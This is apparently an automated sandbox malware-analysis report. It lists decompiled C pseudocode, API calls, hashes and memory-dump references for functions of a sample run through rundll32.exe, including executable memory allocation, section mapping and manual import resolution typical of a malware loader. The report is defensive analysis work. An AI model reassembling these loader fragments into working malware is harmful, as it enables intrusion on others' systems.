    • Instruction Fuzzy Hash: 2E01D2716073259FE721DB2A9C09E2BBAD8FF8AA60F11055AF841DB240DB60C80196A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095076, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E03095076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x309a2c4; // 0x330
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x309a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x309a2c4; // 0x330
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x309a290; // 0x6970000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








    0x03095076
    0x0309507d
    0x030950c7
    0x030950c9
    0x030950c9
    0x03095081
    0x03095087
    0x0309508c
    0x03095090
    0x03095096
    0x0309509d
    0x00000000
    0x00000000
    0x0309509f
    0x030950a4
    0x00000000
    0x00000000
    0x00000000
    0x030950a4
    0x030950a6
    0x030950ae
    0x030950b1
    0x030950b1
    0x030950b7
    0x030950be
    0x030950c1
    0x030950c1
    0x00000000

    APIs
    • SetEvent.KERNEL32(00000330,00000001,030956C9), ref: 03095081
    • SleepEx.KERNEL32(00000064,00000001), ref: 03095090
    • CloseHandle.KERNEL32(00000330), ref: 030950B1
    • HeapDestroy.KERNEL32(06970000), ref: 030950C1
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: CloseDestroyEventHandleHeapSleep
    • String ID:
    • API String ID: 4109453060-0
    • Opcode ID: c2fea8fcefb21bfa82de403420e1e5467672e4b93dca7cd09016acdef8142081
    • Instruction ID: 79e9df7d04fa9b8f974311157921e0e1e92fa719e15e543a4a6ae91591fe0dc7
    • Opcode Fuzzy Hash: c2fea8fcefb21bfa82de403420e1e5467672e4b93dca7cd09016acdef8142081
    • Instruction Fuzzy Hash: 12F01C31B033119BEE21BB3AEC4CB5A77E8BB85B61B0A015ABD54DB188DB29D4109990
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030974B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E030974B6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E03094AA6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E03096304(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E03095F2A(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x309a290, 0, _t23);
				}
				return _t20;
			}









    0x030974b6
    0x030974c7
    0x030974cb
    0x03097524
    0x030974cd
    0x030974d4
    0x030974da
    0x030974e3
    0x030974e7
    0x030974ed
    0x030974fd
    0x0309750f
    0x0309750f
    0x0309751a
    0x0309751a
    0x0309752b

    APIs
      • Part of subcall function 03094AA6: lstrlen.KERNEL32(?,00000000,06D69C98,770CC740,030913D0,06D69E9D,030955DE,030955DE,?,030955DE,?,63699BC3,E8FA7DD7,00000000), ref: 03094AAD
      • Part of subcall function 03094AA6: mbstowcs.NTDLL ref: 03094AD6
      • Part of subcall function 03094AA6: memset.NTDLL ref: 03094AE8
    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,06D692FC), ref: 030974ED
    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,06D692FC), ref: 0309751A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
    • String ID: Uxt
    • API String ID: 1500278894-1536154274
    • Opcode ID: ac3e810691f46dec7b74594ad009b803231dd99d5e6ad280240a39696f19138c
    • Instruction ID: c9f30671855ff93a228e4943a2a8e446f59a073e3999fade0d5304c8bf12901f
    • Opcode Fuzzy Hash: ac3e810691f46dec7b74594ad009b803231dd99d5e6ad280240a39696f19138c
    • Instruction Fuzzy Hash: BA01A236211209BFEF21AF55DC44EDA7BB9FBC4710F00402AFA509A151E7B1D924D750
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03093D98, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
    Download Yara Rule
    C-Code - Quality: 58%
    			E03093D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E03096837(_t2);
				if(_t34 != 0) {
					_t30 = E03096837(_t28);
					if(_t30 == 0) {
						E030950CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E030977DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E030977DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














    0x03093d98
    0x03093da2
    0x03093da4
    0x03093daa
    0x03093daa
    0x03093db3
    0x03093db7
    0x03093dc3
    0x03093dc7
    0x03093e3b
    0x03093dc9
    0x03093dc9
    0x03093dcd
    0x03093dd4
    0x03093dd7
    0x03093df1
    0x03093de0
    0x03093de0
    0x03093de4
    0x03093de7
    0x03093dec
    0x03093dec
    0x03093df6
    0x03093e1e
    0x03093e24
    0x03093e27
    0x03093df8
    0x03093dfa
    0x03093e02
    0x03093e0d
    0x03093e12
    0x03093e12
    0x03093e2e
    0x03093e35
    0x03093e36
    0x03093e36
    0x03093dc7
    0x03093e46

    APIs
    • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,03093CEE,00000000,00000000,00000000,06D69698,?,?,0309106E,?,06D69698), ref: 03093DA4
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
      • Part of subcall function 030977DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03093DD2,00000000,00000001,00000001,?,?,03093CEE,00000000,00000000,00000000,06D69698), ref: 030977EB
      • Part of subcall function 030977DD: StrChrA.SHLWAPI(?,0000003F,?,?,03093CEE,00000000,00000000,00000000,06D69698,?,?,0309106E,?,06D69698,0000EA60,?), ref: 030977F5
    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03093CEE,00000000,00000000,00000000,06D69698,?,?,0309106E), ref: 03093E02
    • lstrcpy.KERNEL32(00000000,00000000), ref: 03093E12
    • lstrcpy.KERNEL32(00000000,00000000), ref: 03093E1E
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
    • String ID:
    • API String ID: 3767559652-0
    • Opcode ID: 2a5e57d88b42505452660c1f477fffe90287b80977dfb3431544a359091343b1
    • Instruction ID: 3eaeb02c4d6ad918690e34997ecd6736d6802266d0a0a8efc5050f0b2d6e156c
    • Opcode Fuzzy Hash: 2a5e57d88b42505452660c1f477fffe90287b80977dfb3431544a359091343b1
    • Instruction Fuzzy Hash: B521C07A406255AFEF12EF64C894BAFBFE8AF46650B054096F8059F201D735C900EBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095D37, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E03095D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E03096837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








    0x03095d4c
    0x03095d50
    0x03095d5a
    0x03095d61
    0x03095d64
    0x03095d66
    0x03095d6e
    0x03095d73
    0x03095d81
    0x03095d86
    0x03095d90

    APIs
    • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,06D692FC,?,03091B37,004F0053,06D692FC,?,?,?,?,?,?,030920B0), ref: 03095D47
    • lstrlenW.KERNEL32(03091B37,?,03091B37,004F0053,06D692FC,?,?,?,?,?,?,030920B0), ref: 03095D4E
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,03091B37,004F0053,06D692FC,?,?,?,?,?,?,030920B0), ref: 03095D6E
    • memcpy.NTDLL(747869A0,03091B37,00000002,00000000,004F0053,747869A0,?,?,03091B37,004F0053,06D692FC), ref: 03095D81
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrlenmemcpy$AllocateHeap
    • String ID:
    • API String ID: 2411391700-0
    • Opcode ID: 56eed33f796244ce1ee568ff3ce4c00ecc06bf8d1d5821fc79c2d4f4cc3bbf91
    • Instruction ID: a93f3991d487b85ebafbc363a6f84a641f354cd16334bfd7c99f19129c84dcd4
    • Opcode Fuzzy Hash: 56eed33f796244ce1ee568ff3ce4c00ecc06bf8d1d5821fc79c2d4f4cc3bbf91
    • Instruction Fuzzy Hash: 64F0EC76901118BB9F11EBA9CC84CDA7BACEE492647154167AA04DB201E736EA149BA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030921C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
    Download Yara Rule
    APIs
    • lstrlen.KERNEL32(06D687FA,00000000,00000000,00000000,03097100,00000000), ref: 030921D1
    • lstrlen.KERNEL32(?), ref: 030921D9
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • lstrcpy.KERNEL32(00000000,06D687FA), ref: 030921ED
    • lstrcat.KERNEL32(00000000,?), ref: 030921F8
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
    • String ID:
    • API String ID: 74227042-0
    • Opcode ID: 667174e990a5091703d8e86472a3a7f43ae93c40838bd911a923434dc99e3f1e
    • Instruction ID: bd1c3233ff07285f0bb69b702e03efe26dd470906c32c9d353b1048cac35c537
    • Opcode Fuzzy Hash: 667174e990a5091703d8e86472a3a7f43ae93c40838bd911a923434dc99e3f1e
    • Instruction Fuzzy Hash: DEE092739022256B8711ABE8AC48C9FBBACFFCD611309041BFA10D3104C728C815DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 6068 Parent PID: 2200 rundll32.exeCOMMON

    Executed Functions

    Function 6E24D8B6, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,000006DD,00003000,00000040,000006DD,6E24D308), ref: 6E24D973
    • VirtualAlloc.KERNEL32(00000000,00000092,00003000,00000040,6E24D368), ref: 6E24D9AA
    • VirtualAlloc.KERNEL32(00000000,0001131C,00003000,00000040), ref: 6E24DA0A
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24DA40
    • VirtualProtect.KERNEL32(6E1D0000,00000000,00000004,6E24D895), ref: 6E24DB45
    • VirtualProtect.KERNEL32(6E1D0000,00001000,00000004,6E24D895), ref: 6E24DB6C
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E24D895), ref: 6E24DC39
    • VirtualProtect.KERNEL32(00000000,?,00000002,6E24D895,?), ref: 6E24DC8F
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24DCAB
    Memory Dump Source
    • Source File: 00000003.00000002.613459310.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
    Similarity
    • API ID: Virtual$Protect$Alloc$Free
    • String ID:
    • API String ID: 2574235972-0
    • Opcode ID: 2d382b74fe919b99f374d6ea33ceeb9597e58b438a81f95748de0f59fe21acb2
    • Instruction ID: fbad667f34206b405a6e0c8d3291c3b1144e94d57a67aa8d49362b47d715d6b0
    • Opcode Fuzzy Hash: 2d382b74fe919b99f374d6ea33ceeb9597e58b438a81f95748de0f59fe21acb2
    • Instruction Fuzzy Hash: C0D1AC769A0206DFDB15EF54C880F5277BAFF4A304B0E0998ED199F65AD7B0A901CF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FB840, Relevance: 7.3, APIs: 1, Strings: 2, Instructions: 2034COMMON
    Download Yara Rule
    APIs
    • GetTempPathA.KERNELBASE(0000070B,?), ref: 6E1FBC22
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: PathTemp
    • String ID: T$v
    • API String ID: 2920410445-3699010257
    • Opcode ID: 115454adea993957a5308927f437c6cfddc86ed751df4aa7a2f3b40d888ee136
    • Instruction ID: ae9d80408f09305a1fabed08b1dee55ac61ba4b0e3af9c1abc00a716ad9d4fcb
    • Opcode Fuzzy Hash: 115454adea993957a5308927f437c6cfddc86ed751df4aa7a2f3b40d888ee136
    • Instruction Fuzzy Hash: 522335B0500A04CFCB3AEF68D598B2C7BB7FB86306F10A119D1699728CE7B55985DF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C3CB, Relevance: 6.2, APIs: 4, Instructions: 236COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E211975,?,?,?,?,6E21142E,?,00000004), ref: 6E21C4AD
    • _wcschr.LIBVCRUNTIME ref: 6E21C53D
    • _wcschr.LIBVCRUNTIME ref: 6E21C54B
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E211975,00000000,6E211A95), ref: 6E21C5EE
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
    • String ID:
    • API String ID: 4212172061-0
    • Opcode ID: c42e88987ea73005b3093153342a8fd407e033f359ec701528f004a027717e00
    • Instruction ID: 0f911a7ef7034adbccae76ded460078d95cb4b0e3b15a2253b065ab50275579c
    • Opcode Fuzzy Hash: c42e88987ea73005b3093153342a8fd407e033f359ec701528f004a027717e00
    • Instruction Fuzzy Hash: EA61D47960C20FABE7189BB5DC56BE677EEEF04B45F100839EB15DB180EB30D64086A4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E6E1D1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E1D1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















    0x6e1d1ba5
    0x6e1d1bac
    0x6e1d1bad
    0x6e1d1bae
    0x6e1d1baf
    0x6e1d1bb0
    0x6e1d1bc1
    0x6e1d1bc5
    0x6e1d1bd9
    0x6e1d1bdc
    0x6e1d1bdf
    0x6e1d1be6
    0x6e1d1be9
    0x6e1d1bf0
    0x6e1d1bf3
    0x6e1d1bf6
    0x6e1d1bf9
    0x6e1d1bfe
    0x6e1d1c39
    0x6e1d1c00
    0x6e1d1c03
    0x6e1d1c09
    0x6e1d1c0e
    0x6e1d1c12
    0x6e1d1c30
    0x6e1d1c14
    0x6e1d1c1b
    0x6e1d1c29
    0x6e1d1c29
    0x6e1d1c12
    0x6e1d1c41

    APIs
    • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E1D1BF9
      • Part of subcall function 6E1D1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1D1C0E,00000002,00000000,?,?,00000000,?,?,6E1D1C0E,00000000), ref: 6E1D1EF4
    • memset.NTDLL ref: 6E1D1C1B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Section$CreateViewmemset
    • String ID: @
    • API String ID: 2533685722-2766056989
    • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
    • Instruction ID: 7c2dcbcfb9f92b3658341096154a299c143ff81e115374629bc78349baa59c07
    • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
    • Instruction Fuzzy Hash: B4210BB1E0020DAFDB01DFE9C8849DEFBB9EB48354F504829E515F3210D735AA499B64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F7CA0, Relevance: 5.0, APIs: 3, Instructions: 514COMMON
    Download Yara Rule
    APIs
    • GetCurrentDirectoryA.KERNEL32(0000070B,?), ref: 6E1F7D5F
    • GetEnvironmentVariableA.KERNELBASE(6E23A56C,?,0000070B), ref: 6E1F7FAC
    • SetConsoleCP.KERNEL32(00000000), ref: 6E1F8097
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ConsoleCurrentDirectoryEnvironmentVariable
    • String ID:
    • API String ID: 575343565-0
    • Opcode ID: df223a6b3b7f2a38b47258f9291405adc1d483c511e88bcc695e0954fb82c34a
    • Instruction ID: 2eb3790b89b799f952992014205335322d1ff072b7e01e2149189ca196398e9a
    • Opcode Fuzzy Hash: df223a6b3b7f2a38b47258f9291405adc1d483c511e88bcc695e0954fb82c34a
    • Instruction Fuzzy Hash: 64420870D00608CFCB29EFACD598A9DBBB3FB89305F10922AD425A7389E7706945CF54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1F7C, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E1D1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e1d41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























    0x6e1d1f7c
    0x6e1d1f85
    0x6e1d1f8a
    0x6e1d1f90
    0x6e1d1f99
    0x6e1d1f9f
    0x6e1d1fa1
    0x6e1d1fa4
    0x6e1d1fa9
    0x6e1d1fb0
    0x6e1d1fb0
    0x6e1d1fb4
    0x6e1d1fbc
    0x6e1d1fbf
    0x00000000
    0x00000000
    0x6e1d1fc5
    0x6e1d1fcf
    0x6e1d1fd1
    0x6e1d1fd4
    0x6e1d1fd7
    0x6e1d1fdb
    0x6e1d1fe3
    0x6e1d1fe5
    0x6e1d1fe8
    0x6e1d2050
    0x6e1d2050
    0x6e1d2054
    0x00000000
    0x00000000
    0x6e1d1fed
    0x6e1d1ff3
    0x6e1d1ff5
    0x6e1d2008
    0x6e1d200b
    0x6e1d200b
    0x6e1d200b
    0x6e1d200f
    0x6e1d1ff7
    0x6e1d1ff7
    0x6e1d1fff
    0x6e1d2001
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e1d2001
    0x6e1d1fef
    0x6e1d1fef
    0x6e1d2003
    0x6e1d2003
    0x6e1d2003
    0x6e1d2012
    0x6e1d2015
    0x6e1d2017
    0x6e1d201e
    0x6e1d2019
    0x6e1d2019
    0x6e1d2019
    0x6e1d2026
    0x6e1d202c
    0x6e1d202e
    0x6e1d205e
    0x6e1d2030
    0x6e1d2030
    0x6e1d2033
    0x6e1d2035
    0x6e1d203d
    0x6e1d203d
    0x6e1d2042
    0x6e1d2044
    0x6e1d204b
    0x6e1d204d
    0x6e1d204d
    0x6e1d204d
    0x00000000
    0x6e1d204d
    0x00000000
    0x6e1d202e
    0x6e1d1fdd
    0x6e1d1fdf
    0x6e1d1fe1
    0x00000000
    0x00000000
    0x6e1d1fe1
    0x6e1d2061
    0x6e1d2061
    0x6e1d2068
    0x6e1d206d
    0x00000000
    0x00000000
    0x6e1d2073
    0x6e1d207e
    0x00000000
    0x6e1d207e
    0x6e1d2075
    0x6e1d2075
    0x6e1d207b
    0x00000000
    0x6e1d207b
    0x6e1d1fa9
    0x6e1d207f
    0x6e1d2084

    APIs
    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1D1FB4
    • GetProcAddress.KERNEL32(?,00000000), ref: 6E1D2026
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID:
    • API String ID: 2574300362-0
    • Opcode ID: 9f22bfceb82b4bdacbc68b3f4695d51a21f91b132a0dd923a2e6226ef957e49a
    • Instruction ID: a7cf4bda483fc8022ffcda79f0cfeae7677aee3bf50acae9dca998ac9b9b6566
    • Opcode Fuzzy Hash: 9f22bfceb82b4bdacbc68b3f4695d51a21f91b132a0dd923a2e6226ef957e49a
    • Instruction Fuzzy Hash: 38315A71A0020ADFEB50CF99C894AAEB7F4FF59300B24406ED825E7344E774DA89EB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1EC7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
    Download Yara Rule
